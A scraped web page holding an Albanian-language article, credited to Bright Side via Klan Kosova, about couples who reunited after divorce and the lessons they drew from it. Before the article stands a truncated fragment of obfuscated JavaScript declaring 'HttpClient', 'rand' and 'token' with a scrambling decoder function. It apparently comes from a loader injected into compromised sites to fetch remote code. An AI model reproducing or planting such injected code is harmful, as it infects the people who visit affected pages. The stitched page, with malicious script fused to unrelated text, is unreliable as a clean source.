;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Këshilla nga çiftet që u ribashkuan pas divorcit

By

Një pjesë e e njerëzve që divorcohen më nuk është se dëshirojnë të martohen sërish. Ndryshe nga kjo, ka disa çifte që i japin edhe një shans të dytë dashurisë së tyre dhe bëhen bashkë edhe pas divorcit. Gjatë procesit, ata mësojnë diçka të re për veten e tyre dhe për mënyrën se si të ndërtojnë një marrëdhënie të qëndrueshme me dikë.

Disa çifte kanë preferuar që ribashkimin e tyre ta bëjnë të ditur edhe me të tjerët në formën virtuale. Bright Side ka përmbledhur disa histori të të dashuruarve të tillë.

“Bari nuk ishte i gjelbër në anën tjetër”

Një burrë kishte treguar se pas tri vjetëve të ndarjes nga gruaja e tij, ajo e kishte telefonuar sërish duke për t’i ndihmuar rreth një kafshe që ajo kishte e cila ishte në gjendje jo të mirë.

“Unë shkova të shihja se çka kishte nevojë, përfunduam duke biseduar me njëri-tjetrin. E kuptuam se ‘bari nuk është më i gjelbër në anën tjetër’. U takuam radhazi për disa muaj me radhë dhe tani jemi të lumtur”.

Punoni në pjekurinë tuaj emocionale

Një person tjetër kishe thënë se me gruan e tij pas divorcit kishte një urrejtje. Dhe se për tre vjet kishin mbajtur kontakte me njëri-tjetrin ku në fund përfundonin me një debat. Pas një kohe ata i ndërprenë të gjitha kontaktet.

“Disa vjet më vonë u takuam më shpesh. Biseduam për çështjet tona të vjetra dhe të dy kuptuam se ishim përmirësuar në fushat me të cilat më parë luftonim, gjithashtu tani jemi shumë më të pjekur emocionalisht. Ne u martuam përsëri në fshehtësi”, kishte thënë një burrë që u bë bashkë me gruan e tij sërish.

Nuk keni nevojë të jeni bashkë 24/7

Disa fëmijë prindërit e të cilëve ishin ndarë kanë deklaruar se debatet në shtëpitë e tyre kishin filluar të bëheshin më të pakta në mes çiftit bashkëshortor kur nuk filluan të qëndronin me njëri-tjetrin gjatë tërë kohës.

“Babai im dhe njerka ishin ndarë, pas 20 vjetëve ata u bashkuan sërish duke e konsideruar budallallëk ndarjen. Ata blenë një shtëpi së bashku dhe në të kishin dy dhoma shtesë, kur kishin nevojë të qëndronin larg njëri-tjetrit ata shkonin atje dhe çdo gjë i kthehej normalitetit”.

Ja vlen të bëni më shumë përpjekje

“Gruaja ime u divorcua nga unë pasi ishim bashkë për vjet, ajo kishte disa probleme me vetëvlerësimin dhe depresionin e rëndë që rrjedhin nga fëmijëria e saj. Pas një kohe ajo më tha se donte që unë të kthehesha. Ajo tani është duke u ndjerë më mirë edhe është duke e vazhduar trajtimin e saj. I qëndroj pranë dhe tani jamë mësuar që asaj t’i jap kohën më shumë si dhe të qëndroj më shumë me të”, kishte thënë një burrë, pasi kishte ndarë historinë e bashkimit të tij me bashkëshorten.

Ndonjëherë nuk është koha e duhur për të qenë bashkë

Një grua kishte treguar se pas ndarjes disa herë kishte tentuar të bashkohej me bashkëshortin e saj por nuk kishte mundur.
” Një ditë makina ime u prish, e thirra atë dhe ai erdhi menjëherë për të ndihmuar. Unë përfundova duke e ftuar atë për darkë. Ai qëndroi dhe ne më në fund ishim në gjendje të kuptonim se ishim të dy që ne po hidhëronim njëri-tjetrin. Ne i dhamë një tjetër mundësi njëri-tjetrit dhe jemi bashkë 13 vjet më vonë – nuk mund të ishim më të lumtur. Ndonjëherë njerëzit thjesht duhet të marrin frymë dhe të rriten para se të marrin vendimet e duhura”, kishte thënë gruaja në fjalë.

“Kurrë nuk është vonë”

“Gjyshi im gjithmonë e vlerësonte punën më shumë se familjen e tij. Në fund, ai dhe gruaja e tij u divorcuan. Kur doli në pension ai përsëri punonte me klientë. Gjyshi dhe gjyshja u bënë bashkë sërish pasi kishin nevojë dhe e donin. Ata u martuan përsëri, njëri në moshën 86 vjeçare dhe tjetri në 89 vjeç, shkruan Bright Side, transmeton Klan Kosova.

Artikuj të ngjashëm